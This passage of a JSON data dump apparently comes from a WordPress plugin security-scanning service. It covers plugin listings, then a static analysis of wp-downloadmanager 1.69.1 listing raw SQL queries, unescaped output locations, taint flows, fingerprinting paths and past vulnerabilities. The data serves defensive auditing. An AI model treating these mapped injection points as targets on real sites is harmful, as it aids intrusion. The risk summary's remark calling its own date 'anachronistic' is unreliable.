versioning meta)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_upload_initial\u003C\u002Fcode> (metabox upload)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_replace_file\u003C\u002Fcode> (metabox replace)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_notices\u003C\u002Fcode> (metabox success\u002Ferror notices via \u003Ccode>kitgenix_dm_notice\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>Filter: \u003Ccode>manage_kitgenix_dm_doc_posts_columns\u003C\u002Fcode> (adds list table columns)\u003C\u002Fli>\n\u003Cli>\u003Ccode>manage_kitgenix_dm_doc_posts_custom_column\u003C\u002Fcode> (renders list table columns)\u003C\u002Fli>\n\u003Cli>Filter: \u003Ccode>post_row_actions\u003C\u002Fcode> (adds “Replace File” row action)\u003C\u002Fli>\n\u003Cli>Filter: \u003Ccode>site_status_tests\u003C\u002Fcode> (registers Site Health test)\u003C\u002Fli>\n\u003Cli>Shortcode: \u003Ccode>kitgenix_document_manager_link\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Other admin UI identifiers:\u003Cbr \u002F>\n– Admin list-table column 
key: \u003Ccode>kitgenix_dm_actions\u003C\u002Fcode>\u003Cbr \u002F>\n– Version restore notice query arg: \u003Ccode>kitgenix_version_restored=1\u003C\u002Fcode>\u003C\u002Fp>\n\u003Cp>Admin asset handles (wp-admin):\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Styles:\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix-hub\u003C\u002Fcode> (Kitgenix hub page)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix-admin-ui\u003C\u002Fcode> (shared Kitgenix admin UI)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix-document-manager-admin\u003C\u002Fcode> (Document Manager settings screen)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Scripts:\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix-admin-tabs\u003C\u002Fcode> (shared Kitgenix tabs UI)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix-document-manager-admin\u003C\u002Fcode> (Document Manager admin JS)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Site Health (Internal)\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Registers Site Health test ID: \u003Ccode>kitgenix_document_manager_uploads\u003C\u002Fcode> (checks uploads directory exists and is writable)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Notes (Internal)\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Uninstall deletes a legacy transient \u003Ccode>kitgenix_document_manager_site_health\u003C\u002Fcode> for backwards compatibility, even though v1 does not set it.\u003C\u002Fli>\n\u003C\u002Ful>\n","Manage document downloads with stable links, version history, and private file 
access.",81,"2026-03-26T20:11:00.000Z","6.0","8.1",[274,21,239,275,276],"documents","private-files","stable-links","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fkitgenix-document-manager\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkitgenix-document-manager.1.0.0.zip",{"slug":280,"name":281,"version":282,"author":283,"author_profile":284,"description":285,"short_description":286,"active_installs":287,"downloaded":288,"rating":289,"num_ratings":290,"last_updated":291,"tested_up_to":16,"requires_at_least":292,"requires_php":18,"tags":293,"homepage":297,"download_link":298,"security_score":299,"vuln_count":300,"unpatched_count":29,"last_vuln_date":301,"fetched_at":31},"filester","File Manager Pro – Filester","2.0.2","Ninja Team","https:\u002F\u002Fprofiles.wordpress.org\u002Fninjateam\u002F","\u003Cp>Filester is a WP File Manager Pro plugin, but you can download and use it completely for free. It comes with all the \u003Cstrong>premium features\u003C\u002Fstrong> of other WordPress advanced file manager plugins out there.\u003C\u002Fp>\n\u003Cp>Filester helps you manage \u003Cstrong>WordPress configuration files\u003C\u002Fstrong>, while \u003Ca href=\"https:\u002F\u002F1.envato.market\u002FFileBird-Folders-Plugin\" rel=\"nofollow ugc\">FileBird\u003C\u002Fa> allows you to manage\u002Fupload\u002Fdownload \u003Cstrong>media library folders\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Cp>With Filester – File Manager Pro, you can copy, paste, create an archive, download, upload, edit, delete, preview, duplicate, and get info of the WordPress configuration and directory files \u003Cstrong>without FTP access\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Cp>This file manager plugin is dedicated to boosting your productivity in managing WordPress. 
All necessary file operations are fully provided and tested on a variety of servers and browsers.\u003C\u002Fp>\n\u003Cp>Another thing you will appreciate about it is the clean and compact UI\u002FUX, which makes editing and transferring directory files and folders extra fast.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Did you know?\u003C\u002Fstrong>\u003Cbr \u002F>\nMore than \u003Ca href=\"https:\u002F\u002Fwww.wordfence.com\u002Fblog\u002F2020\u002F09\u002Fmillions-of-sites-targeted-in-file-manager-vulnerability-attacks\u002F\" rel=\"nofollow ugc\">700,000 WordPress websites\u003C\u002Fa> were attacked during September 2020.\u003Cbr \u002F>\nMalicious bots are looking to exploit vulnerable versions of WP file manager plugins.\u003Cbr \u002F>\nFortunately, Filester comes with this vulnerability \u003Cstrong>fixed\u003C\u002Fstrong>!\u003Cbr \u002F>\nFilester poses no risk to you, so rest assured! 🤗\u003C\u002Fp>\n\u003Ch3>⚡️ FEATURES\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Drag & drop interface:\u003C\u002Fstrong> Easily move and arrange files\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Smart context menu:\u003C\u002Fstrong> Right-click on any files to make operations\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Manage files and folders:\u003C\u002Fstrong> Copy, move, upload, create folder\u002Ffile, rename, duplicate, etc.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Built-in advanced code editor:\u003C\u002Fstrong> Integrated development environment ACE Editor, CodeMirror, CKEditor, TinyMCE, and others\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Flexible configuration:\u003C\u002Fstrong> Access rights, uploadable file types\u002Fextensions, maximum file size limit, and more\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Create\u002Fextract archives:\u003C\u002Fstrong> .zip, .rar, .xz, .tar, .gzip\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Great UI\u002FUX design:\u003C\u002Fstrong> Clean, high-quality & productivity-driven \u003C\u002Fli>\n\u003Cli>\u003Cstrong>User authority 
settings:\u003C\u002Fstrong> File extensions to be locked, file visibility, root path access, .htaccess file \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Edit media files:\u003C\u002Fstrong> Using Photopea & TUI Image Editor\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Multiple languages supported:\u003C\u002Fstrong> English, German, Spanish, Italian, French, Japanese, etc.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>RTL supported:\u003C\u002Fstrong> Hebrew, Arabic, Persian, Kurdish, etc.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🙌 OTHER FEATURES\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Local file system\u003C\u002Fli>\n\u003Cli>Simple client-server API based on JSON\u003C\u002Fli>\n\u003Cli>List and icon view\u003C\u002Fli>\n\u003Cli>Multi-root support\u003C\u002Fli>\n\u003Cli>Hidden files\u002Ffolders options\u003C\u002Fli>\n\u003Cli>Set hidden files for other users\u003C\u002Fli>\n\u003Cli>Root path for each user role\u003C\u002Fli>\n\u003Cli>Easy to navigate\u003C\u002Fli>\n\u003Cli>6 themes for your preferred interface\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🔑 HOW IT WORKS\u003C\u002Fh3>\n\u003Cp>Filester plugin helps you easily manage WordPress files so that you don’t have to access directories via FTP or cPanel.\u003C\u002Fp>\n\u003Cp>This plugin creates a new menu \u003Cstrong>File Manager\u003C\u002Fstrong> in your WordPress dashboard. From then on, you can view all server files, configuration, and media files on your current WordPress website.\u003C\u002Fp>\n\u003Cp>You can edit, copy, upload\u002Fdownload files\u002Ffolders to your server from File Manager section. This toolbar is similar to the settings in an FTP client. It allows you to preview, edit, upload, download, duplicate and delete files or folders.\u003C\u002Fp>\n\u003Cp>With Filester, it’s easy to modify the auto-update mechanism with each new version of WordPress. 
You can quickly \u003Cstrong>search for specific text or code\u003C\u002Fstrong> within your WordPress files and replace it efficiently.\u003C\u002Fp>\n\u003Cp>With built-in code editors, you can edit code files with syntax highlighting and code completion features for themes, plugins, and custom code snippets. It takes one click to download a plugin’s \u003Cstrong>ZIP file\u003C\u002Fstrong> to your local storage. It helps track changes made to files and revert to previous versions if needed.\u003C\u002Fp>\n\u003Cp>All webmasters can also \u003Ca href=\"https:\u002F\u002Fninjateam.org\u002Fdownload-wordpress-media-library\u002F\" rel=\"nofollow ugc\">download WordPress media library\u003C\u002Fa> using Filester download options as well.\u003C\u002Fp>\n\u003Ch3>🎏 COMPATIBILITY\u003C\u002Fh3>\n\u003Cp>Filester works seamlessly with all major WordPress themes, page builders, and website builders.\u003C\u002Fp>\n\u003Cp>💙 \u003Cstrong>Like Filester?\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Ffilester\u002Freviews\u002F?filter=5\" rel=\"ugc\">Share your experience\u003C\u002Fa> and empower other users to manage WordPress like a pro.\u003C\u002Fp>\n\u003Cp>👉 Check out NinjaTeam \u003Ca href=\"https:\u002F\u002Fninjateam.org\u002Fcategory\u002Ftutorials\u002F\" rel=\"nofollow ugc\">WordPress tutorials\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>CREDIT\u003C\u002Fh4>\n\u003Cp>Big thanks to elFinder – open-source file manager for web.\u003C\u002Fp>\n","Advanced File Manager and Code Editor. Best WordPress file manager without FTP access. 
No need to upgrade because this is PRO version.",100000,1371112,98,147,"2026-01-12T14:11:00.000Z","3.0",[294,239,23,295,296],"download-plugin","wordpress-file-manager","wp-file-manager","https:\u002F\u002Fninjateam.org\u002Ffilester","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffilester.2.0.2.zip",91,9,"2025-06-19 00:00:00",{"attackSurface":303,"codeSignals":410,"taintFlows":760,"riskAssessment":843,"analyzedAt":859},{"hooks":304,"ajaxHandlers":396,"restRoutes":397,"shortcodes":398,"cronEvents":409,"entryPointCount":56,"unprotectedCount":29},[305,310,314,318,321,324,327,330,333,336,341,345,349,353,357,360,365,368,372,376,380,384,388,392],{"type":306,"name":307,"callback":308,"file":53,"line":309},"action","plugins_loaded","downloadmanager_textdomain",36,{"type":306,"name":311,"callback":312,"file":53,"line":313},"admin_menu","downloads_menu",48,{"type":306,"name":315,"callback":316,"file":53,"line":317},"wp_enqueue_scripts","downloads_stylesheets",60,{"type":306,"name":319,"callback":320,"file":53,"line":200},"admin_enqueue_scripts","downloads_stylesheets_admin",{"type":306,"name":322,"callback":323,"file":53,"line":269},"admin_footer-post-new.php","downloads_footer_admin",{"type":306,"name":325,"callback":323,"file":53,"line":326},"admin_footer-post.php",82,{"type":306,"name":328,"callback":323,"file":53,"line":329},"admin_footer-page-new.php",83,{"type":306,"name":331,"callback":323,"file":53,"line":332},"admin_footer-page.php",84,{"type":306,"name":334,"callback":335,"file":53,"line":260},"init","download_tinymce_addbuttons",{"type":337,"name":338,"callback":339,"file":53,"line":340},"filter","mce_external_plugins","download_tinymce_addplugin",106,{"type":337,"name":342,"callback":343,"file":53,"line":344},"mce_buttons","download_tinymce_registerbutton",107,{"type":337,"name":346,"callback":347,"file":53,"line":348},"wp_mce_translation","download_tinymce_translation",108,{"type":337,"name":350,"callback":351,"file":53,"line":352},"query_vars","down
load_query_vars",131,{"type":337,"name":354,"callback":355,"file":53,"line":356},"generate_rewrite_rules","download_rewrite",140,{"type":306,"name":358,"callback":359,"file":53,"line":290},"wp_head","download_rss_link",{"type":306,"name":361,"callback":362,"priority":363,"file":53,"line":364},"template_redirect","download_file",5,162,{"type":306,"name":307,"callback":366,"file":53,"line":367},"downloadmanager_wp_stats",1261,{"type":337,"name":369,"callback":370,"file":53,"line":371},"wp_stats_page_admin_plugins","downloadmanager_page_admin_general_stats",1263,{"type":337,"name":373,"callback":374,"file":53,"line":375},"wp_stats_page_admin_recent","downloadmanager_page_admin_recent_stats",1264,{"type":337,"name":377,"callback":378,"file":53,"line":379},"wp_stats_page_admin_most","downloadmanager_page_admin_most_stats",1265,{"type":337,"name":381,"callback":382,"file":53,"line":383},"wp_stats_page_plugins","downloadmanager_page_general_stats",1266,{"type":337,"name":385,"callback":386,"file":53,"line":387},"wp_stats_page_recent","downloadmanager_page_recent_stats",1267,{"type":337,"name":389,"callback":390,"file":53,"line":391},"wp_stats_page_most","downloadmanager_page_most_stats",1268,{"type":306,"name":393,"callback":394,"file":53,"line":395},"widgets_init","widget_downloadmanager_init",1493,[],[],[399,403,406],{"tag":400,"callback":401,"file":53,"line":402},"page_download","download_page_shortcode",436,{"tag":404,"callback":401,"file":53,"line":405},"page_downloads",437,{"tag":20,"callback":407,"file":53,"line":408},"download_shortcode",445,[],{"dangerousFunctions":411,"sqlUsage":412,"outputEscaping":483,"fileOperations":754,"externalRequests":29,"nonceChecks":363,"capabilityChecks":755,"bundledLibraries":756},[],{"prepared":363,"raw":413,"locations":414},32,[415,419,421,424,426,428,430,432,434,436,439,441,442,445,447,449,451,453,455,457,459,461,463,465,467,469,471,473,475,477,479,481],{"file":416,"line":417,"context":418},"download-add.php",86,"$wpdb->query() 
with variable interpolation",{"file":50,"line":420,"context":418},204,{"file":50,"line":422,"context":423},240,"$wpdb->get_row() with variable interpolation",{"file":50,"line":425,"context":423},378,{"file":50,"line":408,"context":427},"$wpdb->get_var() with variable interpolation",{"file":50,"line":429,"context":427},446,{"file":50,"line":431,"context":427},447,{"file":50,"line":433,"context":427},448,{"file":50,"line":435,"context":427},449,{"file":50,"line":437,"context":438},477,"$wpdb->get_results() with variable interpolation",{"file":440,"line":56,"context":427},"download-rss.php",{"file":440,"line":300,"context":438},{"file":443,"line":444,"context":418},"uninstall.php",72,{"file":53,"line":446,"context":423},174,{"file":53,"line":448,"context":423},179,{"file":53,"line":450,"context":418},193,{"file":53,"line":452,"context":438},522,{"file":53,"line":454,"context":438},580,{"file":53,"line":456,"context":427},981,{"file":53,"line":458,"context":427},993,{"file":53,"line":460,"context":427},1005,{"file":53,"line":462,"context":438},1098,{"file":53,"line":464,"context":438},1152,{"file":53,"line":466,"context":438},1211,{"file":53,"line":468,"context":423},1315,{"file":53,"line":470,"context":427},1574,{"file":53,"line":472,"context":418},1577,{"file":53,"line":474,"context":418},1579,{"file":53,"line":476,"context":427},1587,{"file":53,"line":478,"context":418},1589,{"file":53,"line":480,"context":418},1591,{"file":53,"line":482,"context":418},1593,{"escaped":484,"rawEcho":485,"locations":486},161,146,[487,490,492,494,495,497,499,501,503,505,507,509,511,513,515,517,519,521,523,525,526,528,530,532,534,536,538,540,542,544,546,548,550,552,554,556,558,560,562,564,566,568,570,572,574,576,578,580,582,584,586,588,590,592,594,596,598,600,601,603,605,607,609,611,613,615,617,618,619,621,622,624,625,627,628,630,631,633,635,637,639,641,642,644,646,648,650,652,654,656,659,661,663,664,666,667,669,671,673,675,677,679,681,683,685,687,689,691,693,695,697,699,701,703,705,707,
709,711,713,715,717,719,721,723,724,725,726,728,730,731,733,734,735,736,738,739,740,741,743,744,745,746,748,750,751,753],{"file":416,"line":488,"context":489},99,"raw output",{"file":416,"line":491,"context":489},102,{"file":416,"line":493,"context":489},103,{"file":416,"line":290,"context":489},{"file":50,"line":496,"context":489},244,{"file":50,"line":498,"context":489},245,{"file":50,"line":500,"context":489},246,{"file":50,"line":502,"context":489},247,{"file":50,"line":504,"context":489},253,{"file":50,"line":506,"context":489},254,{"file":50,"line":508,"context":489},255,{"file":50,"line":510,"context":489},256,{"file":50,"line":512,"context":489},271,{"file":50,"line":514,"context":489},273,{"file":50,"line":516,"context":489},274,{"file":50,"line":518,"context":489},285,{"file":50,"line":520,"context":489},324,{"file":50,"line":522,"context":489},326,{"file":50,"line":524,"context":489},336,{"file":50,"line":524,"context":489},{"file":50,"line":527,"context":489},340,{"file":50,"line":529,"context":489},344,{"file":50,"line":531,"context":489},348,{"file":50,"line":533,"context":489},352,{"file":50,"line":535,"context":489},380,{"file":50,"line":537,"context":489},382,{"file":50,"line":539,"context":489},391,{"file":50,"line":541,"context":489},395,{"file":50,"line":543,"context":489},399,{"file":50,"line":545,"context":489},403,{"file":50,"line":547,"context":489},407,{"file":50,"line":549,"context":489},411,{"file":50,"line":551,"context":489},415,{"file":50,"line":553,"context":489},419,{"file":50,"line":555,"context":489},423,{"file":50,"line":557,"context":489},427,{"file":50,"line":559,"context":489},479,{"file":50,"line":561,"context":489},524,{"file":50,"line":563,"context":489},525,{"file":50,"line":565,"context":489},526,{"file":50,"line":567,"context":489},527,{"file":50,"line":569,"context":489},528,{"file":50,"line":571,"context":489},529,{"file":50,"line":573,"context":489},530,{"file":50,"line":575,"context":489},531,{"file":50,"line":577,"con
text":489},532,{"file":50,"line":579,"context":489},533,{"file":50,"line":581,"context":489},538,{"file":50,"line":583,"context":489},552,{"file":50,"line":585,"context":489},561,{"file":50,"line":587,"context":489},570,{"file":50,"line":589,"context":489},573,{"file":50,"line":591,"context":489},576,{"file":50,"line":593,"context":489},581,{"file":50,"line":595,"context":489},583,{"file":50,"line":597,"context":489},588,{"file":50,"line":599,"context":489},591,{"file":50,"line":599,"context":489},{"file":50,"line":602,"context":489},602,{"file":50,"line":604,"context":489},611,{"file":50,"line":606,"context":489},634,{"file":50,"line":608,"context":489},636,{"file":50,"line":610,"context":489},658,{"file":50,"line":612,"context":489},662,{"file":50,"line":614,"context":489},666,{"file":50,"line":616,"context":489},670,{"file":51,"line":491,"context":489},{"file":51,"line":493,"context":489},{"file":51,"line":620,"context":489},124,{"file":51,"line":620,"context":489},{"file":51,"line":623,"context":489},126,{"file":51,"line":623,"context":489},{"file":51,"line":626,"context":489},134,{"file":51,"line":626,"context":489},{"file":51,"line":629,"context":489},136,{"file":51,"line":629,"context":489},{"file":51,"line":632,"context":489},160,{"file":440,"line":634,"context":489},15,{"file":440,"line":636,"context":489},27,{"file":440,"line":638,"context":489},29,{"file":440,"line":640,"context":489},31,{"file":440,"line":413,"context":489},{"file":440,"line":643,"context":489},33,{"file":440,"line":645,"context":489},38,{"file":440,"line":647,"context":489},39,{"file":440,"line":649,"context":489},40,{"file":440,"line":651,"context":489},41,{"file":440,"line":653,"context":489},42,{"file":440,"line":655,"context":489},43,{"file":657,"line":658,"context":489},"download-templates.php",92,{"file":657,"line":660,"context":489},120,{"file":657,"line":662,"context":489},123,{"file":657,"line":623,"context":489},{"file":657,"line":665,"context":489},129,{"file":657,"line":290,
"context":489},{"file":53,"line":668,"context":489},156,{"file":53,"line":670,"context":489},793,{"file":53,"line":672,"context":489},795,{"file":53,"line":674,"context":489},802,{"file":53,"line":676,"context":489},804,{"file":53,"line":678,"context":489},819,{"file":53,"line":680,"context":489},849,{"file":53,"line":682,"context":489},851,{"file":53,"line":684,"context":489},864,{"file":53,"line":686,"context":489},866,{"file":53,"line":688,"context":489},875,{"file":53,"line":690,"context":489},877,{"file":53,"line":692,"context":489},886,{"file":53,"line":694,"context":489},888,{"file":53,"line":696,"context":489},896,{"file":53,"line":698,"context":489},898,{"file":53,"line":700,"context":489},907,{"file":53,"line":702,"context":489},909,{"file":53,"line":704,"context":489},983,{"file":53,"line":706,"context":489},995,{"file":53,"line":708,"context":489},1007,{"file":53,"line":710,"context":489},1139,{"file":53,"line":712,"context":489},1193,{"file":53,"line":714,"context":489},1252,{"file":53,"line":716,"context":489},1402,{"file":53,"line":718,"context":489},1419,{"file":53,"line":720,"context":489},1421,{"file":53,"line":722,"context":489},1453,{"file":53,"line":722,"context":489},{"file":53,"line":722,"context":489},{"file":53,"line":722,"context":489},{"file":53,"line":727,"context":489},1456,{"file":53,"line":729,"context":489},1457,{"file":53,"line":729,"context":489},{"file":53,"line":732,"context":489},1465,{"file":53,"line":732,"context":489},{"file":53,"line":732,"context":489},{"file":53,"line":732,"context":489},{"file":53,"line":737,"context":489},1468,{"file":53,"line":737,"context":489},{"file":53,"line":737,"context":489},{"file":53,"line":737,"context":489},{"file":53,"line":742,"context":489},1472,{"file":53,"line":742,"context":489},{"file":53,"line":742,"context":489},{"file":53,"line":742,"context":489},{"file":53,"line":747,"context":489},1476,{"file":53,"line":749,"context":489},1477,{"file":53,"line":749,"context":489},{"file":53,"line"
:752,"context":489},1486,{"file":53,"line":752,"context":489},6,11,[757],{"name":758,"version":39,"knownCves":759},"TinyMCE",[],[761,778,810,823,833],{"entryPoint":762,"graph":763,"unsanitizedCount":29,"severity":70},"\u003Cdownload-add> (download-add.php:0)",{"nodes":764,"edges":775},[765,770],{"id":766,"type":767,"label":768,"file":416,"line":769},"n0","source","$_POST",59,{"id":771,"type":772,"label":773,"file":416,"line":488,"wp_function":774},"n1","sink","echo() [XSS]","echo",[776],{"from":766,"to":771,"sanitized":777},true,{"entryPoint":779,"graph":780,"unsanitizedCount":29,"severity":70},"\u003Cdownload-manager> (download-manager.php:0)",{"nodes":781,"edges":805},[782,784,788,790,795,798,800,803],{"id":766,"type":767,"label":768,"file":50,"line":783},215,{"id":771,"type":772,"label":785,"file":50,"line":786,"wp_function":787},"get_row() [SQLi]",216,"get_row",{"id":789,"type":767,"label":768,"file":50,"line":783},"n2",{"id":791,"type":772,"label":792,"file":50,"line":793,"wp_function":794},"n3","query() [SQLi]",225,"query",{"id":796,"type":767,"label":797,"file":50,"line":783},"n4","$_POST (x39)",{"id":799,"type":772,"label":773,"file":50,"line":496,"wp_function":774},"n5",{"id":801,"type":767,"label":802,"file":50,"line":634},"n6","$_GET (x10)",{"id":804,"type":772,"label":773,"file":50,"line":583,"wp_function":774},"n7",[806,807,808,809],{"from":766,"to":771,"sanitized":777},{"from":789,"to":791,"sanitized":777},{"from":796,"to":799,"sanitized":777},{"from":801,"to":804,"sanitized":777},{"entryPoint":811,"graph":812,"unsanitizedCount":29,"severity":70},"\u003Cdownload-options> (download-options.php:0)",{"nodes":813,"edges":821},[814,817],{"id":766,"type":767,"label":815,"file":51,"line":816},"$_POST (x5)",16,{"id":771,"type":772,"label":818,"file":51,"line":819,"wp_function":820},"update_option() [Settings 
Manipulation]",51,"update_option",[822],{"from":766,"to":771,"sanitized":777},{"entryPoint":824,"graph":825,"unsanitizedCount":29,"severity":70},"\u003Cdownload-templates> (download-templates.php:0)",{"nodes":826,"edges":831},[827,830],{"id":766,"type":767,"label":828,"file":657,"line":829},"$_POST (x8)",35,{"id":771,"type":772,"label":818,"file":657,"line":819,"wp_function":820},[832],{"from":766,"to":771,"sanitized":777},{"entryPoint":834,"graph":835,"unsanitizedCount":29,"severity":70},"\u003Cwp-downloadmanager> (wp-downloadmanager.php:0)",{"nodes":836,"edges":841},[837,840],{"id":766,"type":767,"label":838,"file":53,"line":839},"$_GET (x3)",491,{"id":771,"type":772,"label":773,"file":53,"line":710,"wp_function":774},[842],{"from":766,"to":771,"sanitized":777},{"summary":844,"deductions":845},"The wp-downloadmanager plugin v1.69.1 presents a mixed security posture.  While the static analysis shows a relatively small attack surface with no immediately identified unprotected entry points and a decent number of capability checks and nonces, concerns arise from the SQL query handling.  A significant portion (86%) of SQL queries are not using prepared statements, which, combined with the presence of file operations and external HTTP requests (though none active), indicates a potential for SQL injection vulnerabilities if input is not rigorously sanitized.\n\nThe vulnerability history is a major red flag. The plugin has a substantial number of known CVEs, including two high-severity vulnerabilities. The types of past vulnerabilities, such as Path Traversal, Unrestricted Upload, XSS, and SSRF, are all serious and suggest recurring issues with input validation and sanitization. The fact that the last vulnerability was in 2026 (anachronistic, but indicating recent historical issues) further emphasizes the need for caution. 
While there are currently no unpatched vulnerabilities, the historical pattern is concerning.\n\nIn conclusion, the plugin exhibits good practices in terms of limiting its direct attack surface and implementing some security checks. However, the prevalence of raw SQL queries and the extensive history of critical and high-severity vulnerabilities, particularly those related to input validation and path manipulation, necessitate a cautious approach. Users should be aware of the past security issues and ensure they are running the latest patched versions.",[846,848,850,853,855,857],{"reason":847,"points":634},"High percentage of SQL queries without prepared statements",{"reason":849,"points":196},"History of 2 high severity CVEs",{"reason":851,"points":852},"History of 7 medium severity CVEs",14,{"reason":854,"points":223},"History of 1 low severity CVE",{"reason":856,"points":28},"Common vulnerability types indicate input sanitization issues",{"reason":858,"points":56},"Bundled library (TinyMCE) may have its own 
vulnerabilities","2026-03-16T18:23:11.579Z",{"wat":861,"direct":874},{"assetPaths":862,"generatorPatterns":867,"scriptPaths":868,"versionParams":869},[863,864,865,866],"\u002Fwp-content\u002Fplugins\u002Fwp-downloadmanager\u002Fdownload-css.css","\u002Fwp-content\u002Fplugins\u002Fwp-downloadmanager\u002Fdownload-admin-css.css","\u002Fwp-content\u002Fplugins\u002Fwp-downloadmanager\u002Ftinymce\u002Fplugins\u002Fdownloadmanager\u002Fplugin.js","\u002Fwp-content\u002Fplugins\u002Fwp-downloadmanager\u002Ftinymce\u002Fplugins\u002Fdownloadmanager\u002Fplugin.min.js",[],[865,866],[870,871,872,873],"wp-downloadmanager\u002Fdownload-css.css?ver=","wp-downloadmanager\u002Fdownload-admin-css.css?ver=","wp-downloadmanager\u002Ftinymce\u002Fplugins\u002Fdownloadmanager\u002Fplugin.js?v=","wp-downloadmanager\u002Ftinymce\u002Fplugins\u002Fdownloadmanager\u002Fplugin.min.js?v=",{"cssClasses":875,"htmlComments":876,"htmlAttributes":877,"restEndpoints":879,"jsGlobals":880,"shortcodeOutput":883},[],[],[878],"ed_wp_downloadmanager",[],[881,882],"QTags.addButton","QTags.insertContent",[884],"[download id=",{"error":777,"url":886,"statusCode":887,"statusMessage":888,"message":888},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fwp-downloadmanager\u002Fbundle",404,"no bundle for this plugin 
yet",{"slug":4,"current_version":6,"total_versions":890,"versions":891},24,[892,897,905,914,926,937,950,962,978,993,1010,1027,1044,1061,1078,1095,1112,1129,1146,1163,1180,1197,1214,1231],{"version":6,"download_url":26,"svn_tag_url":893,"released_at":39,"has_diff":55,"diff_files_changed":894,"diff_lines":39,"trac_diff_url":895,"vulnerabilities":896,"is_current":777},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.69.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.69&new_path=%2Fwp-downloadmanager%2Ftags%2F1.69.1",[],{"version":91,"download_url":898,"svn_tag_url":899,"released_at":39,"has_diff":55,"diff_files_changed":900,"diff_lines":39,"trac_diff_url":901,"vulnerabilities":902,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.69.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.69\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.11&new_path=%2Fwp-downloadmanager%2Ftags%2F1.69",[903,904],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":107,"download_url":906,"svn_tag_url":907,"released_at":39,"has_diff":55,"diff_files_changed":908,"diff_lines":39,"trac_diff_url":909,"vulnerabilities":910,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.11.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.11\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.10&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.11",[911,912,913],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patc
hed_in_version":6},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":915,"download_url":916,"svn_tag_url":917,"released_at":39,"has_diff":55,"diff_files_changed":918,"diff_lines":39,"trac_diff_url":919,"vulnerabilities":920,"is_current":55},"1.68.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.10.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.10\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.9&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.10",[921,922,923,924,925],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":133,"download_url":927,"svn_tag_url":928,"released_at":39,"has_d